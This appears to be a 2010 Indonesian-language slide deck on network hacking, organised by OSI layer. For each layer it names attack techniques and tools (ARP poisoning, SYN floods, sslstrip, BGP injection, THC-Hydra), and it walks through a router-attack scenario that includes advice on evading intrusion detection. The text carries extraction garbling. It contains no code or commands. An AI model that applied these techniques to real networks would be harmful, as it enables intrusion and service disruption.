Deep Knowledge on Network Hacking Philosopy

Deep Knowledge on Network Hacking Philosopy
DEEP KNOWLEDGE ON NETWORK HACKING PHILOSOPY ATIK PILIHANTO MAKASAR, DEC 2010 http://ipsecs.com
PHILOSOPY Pengetahuan secara general dan fundamental mengenai g g g objective dari sebuah masalah Network Hacking Philosopy?? Dasar dan pemahaman fundamental mengenai j jaringan komputer dan vulnerability pada protokol komunikasi Let s Let’s start to understand our network!
OSI MODEL OSI MODEL OSI model 7 layer : physical, data link, network, transport, y p y p session, presentation, dan application
RELASI HACKING DAN OSI OSI mendeskripsikan secara general dan fundamental bagaimana komunikasi g digital bekerja Teknologi pada setiap layer?? Is this technology exist in your network? Or which technology is used? Vulnerability, Vulnerability attack vector impact dan vector, impact, how to exploit?
OSI : Layer #1 ‐ OSI : Layer #1 OSI : Layer #1 ‐ Physical Contoh Teknologi; IEEE 802.3, IEEE 802.11, IEEE 802.16; SONET/SDH, ADSL / Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #1? physical access? Impact; sebagian besar besar Denial of Service. Contoh Vulnerability; N/A How to exploit; pemotongan kabel fiber dan wireless (802.11/802.16) signal jamming Not so interesting, but sometimes occurred!
OSI : Layer #2 – OSI : Layer #2 Data Link OSI : Layer #2 – Data Link Contoh T k l i L C t h Teknologi; Layer 2 switch (IEEE 802 3) ARP ATM d it h 802.3), ARP, ATM, dan frame relay. Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #2? Local Area Network? Impact; Pelanggaran confidentiality dan integrity, Denial of Service Contoh Vulnerability; Limitasi switch CAM table dan ARP cache poisoning How to exploit; Flooding CAM table dan ARP cache poisoning dengan tujuan DoS atau Man in The Middle, yersinia L2 attack toolkit Exploitasi d l E l i i pada layer #2 sering di k bi ik d # i kombinasikan dengan b b i berbagai serangan lain misalnya sniffing dan replay attack.
OSI : Layer #3 – OSI : Layer #3 OSI : Layer #3 – Network Contoh Teknologi; IP ICMP IPSEC d R i protocol. C h T k l i IP, ICMP, IPSEC, dan Routing l Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #3? Remotely accessible? Impact; Pelanggaran confidentiality dan integrity, Denial of Service Contoh Vulnerability; packet spoofing, celah keamanan routing protocol, dan celah kemanan ipsec How to exploit; IP spoofing, IP fragmentation, ICMP smurfing, BGP man in the middle, BGP NLRI injection, LDP injection on MPLS, GRE traffic tunneling, dan loki project Exploitasi pada layer #3 sering di kombinasikan dengan berbagai serangan lain misalnya sniffing
OSI : Layer #4 – OSI : Layer #4 OSI : Layer #4 – Transport Contoh Teknologi; UDP TCP, SCTP C h T k l i UDP, TCP Attack vector; apakah attacker mungkin mengakses teknologi p pada Layer #4? Remotely accessible? y y Impact; Pelanggaran confidentiality dan integrity, Denial of Service, dan gaining access. Contoh Vulnerability; packet spoofing, d session hij ki C h l bili k fi dan i hijacking How to exploit; SYN flooding, UDP flooding, TCP session hijacking, SCTP scanning to find SS7 network entry point j g, g f yp
OSI : Layer #5 – OSI : Layer #5 Session OSI : Layer #5 – Session Contoh Teknologi; N BIOS L TP PPTP C h T k l i NetBIOS, L2TP, Attack vector; apakah attacker mungkin mengakses teknologi p pada Layer #5? Remotely accessible? y y Impact; Pelanggaran confidentiality dan gaining access. Contoh Vulnerability; User enumeration How to exploit; Enumerate user using NetBIOS
OSI : Layer #6 – OSI : Layer #6 OSI : Layer #6 – Presentation Contoh Teknologi; SSL, TLS C h T k l i SSL Attack vector; apakah attacker mungkin mengakses teknologi p pada Layer #6? Remotely accessible? y y Impact; Pelanggaran confidentiality dan integrity, dan gaining access. Contoh Vulnerability; SS Man i The Middle C h l bili SSL in h iddl How to exploit; Doing SSL Man in The Middle, dsniff, sslstrip Exploitasi pada layer #6 sering di kombinasikan dengan berbagai serangan lain misalnya sniffing
OSI : Layer #7 – OSI : Layer #7 OSI : Layer #7 – Application Contoh Teknologi; HTTP SMTP, DNS, SSH, FTP C h T k l i HTTP, SMTP DNS SSH Attack vector; apakah attacker mungkin mengakses teknologi p pada Layer #7? Remotely accessible? y y Impact; Pelanggaran confidentiality dan integrity, Denial of Service, dan gaining access. Contoh Vulnerability; b ff overflow, f C h l bili buffer fl format string, web i b application vulnerability. How to exploit; Exploiting buffer overflow /format string to gain p p g ff f f g g access or doing service denial, exploiting web application to gain access
KNOWING YOURSELF KNOWING YOURSELF In which layer you have access? On layer 1, 2, 3, 4, 5, 6, 7 or all? The more you close to lowest layer, the more your chance o lo est la er o r to win the war
KNOWING YOUR ENEMY KNOWING YOUR ENEMY Reconaisance to gain as much as possible information about the enemy Scanning to gain information which host is ali e and hich alive which service is running The more you have information about your enemy the enemy, more your chance to win the war
IF YOU KNOW BOTH YOURSELF AND YOUR ENEMY – YOU IF YOU KNOW BOTH YOURSELF AND YOUR ENEMY – WILL WIN IN MANY WARS ‐ WILL WIN IN MANY WARS ‐ SUNTZU
THINGS TO REMEMBER THINGS TO REMEMBER Transport set vulnerability: p y Easy to prevent (Firewall, ACL) Hard to fix (Update, Patch) Application set vulnerability: Hard to prevent (Firewall, ACL) Easy to fix (Update, Patch)
THINGS TO REMEMBER THINGS TO REMEMBER Keep anonymous and stealth, don’t be so rough! Man in the middle example on Layer #2 : ARP cache poisoning OR CAM table flooding? Exploiting remote buffer overflow on Layer #7: Evading IDS/IPS/IDP Polymorphic, Encoded shell code OR IP fragmentation??
AN EXAMPLE Router A, B, C, D mengaktifkan layanan BGP dan SSH dan bisa diakses dari laptop attacker dan admin Attacker tidak terkoneksi ke laptop admin dan berbeda jaringan dengan router A,B,C, dan D
KNOWING YOUR ENEMY Attacker (you) want to compromise VPN MPLS network He can’t directly attack administrator computer After doing host enumeration, he knows that there’s four g routers on the network After doing service scanning, he knows all routers activating SSH and BGP as its service i i d i i After doing vulnerability scanning, he knows some routers has vulnerability Attacker search in search engine all information related to administrator, email address, and many others
KNOWING YOURSELF KNOWING YOURSELF Do you have access to layer #1? No y y Do you have access to layer #2? No Do you have access to layer #3? Yes, useful for exploitation y y # , p Do you have access to layer #4? Yes, useful for exploitation Do you have access to layer #5? Yes, Not Applicable Yes Do you have access to layer #6? Yes, Not Applicable Do you have access to layer #7? Yes useful for exploitation Yes, SO WHAT??
LAYER #3 ATTACK Border Gateway Attack? BGP Man In The Middle BGP NLRI injection to reroute traffic BGP MD5 crack if applicable MPLS Attack? LDP i j i to rewrite label injection i l b l ICMP? ICMP flooding and denial of service Will be really useful if one router has been compromised!
LAYER #4 ATTACK LAYER #4 ATTACK TCP? SYN Flooding to SSH and BGP port causing denial of service TCP FIN/RST to close BGP Established session UDP and others layer #4 protocol is not applicable
LAYER #7 ATTACK LAYER #7 ATTACK Exploiting routers vulnerability to gain access p g y g Buffer overflow? Format string? Denial of service? Guessing routers user and password to gain access NCRAK? THC-Hydra YES! You can use social engineering but it’s different topic from hacking the network!
QUESTION AND ANSWER
THANK YOU

Deep Knowledge on Network Hacking Philosopy

Check these out next

Deep Knowledge on Network Hacking Philosopy

Recommended

More Related Content

Similar to Deep Knowledge on Network Hacking Philosopy(20)

More from Don Anto(7)

Recently uploaded(20)

Deep Knowledge on Network Hacking Philosopy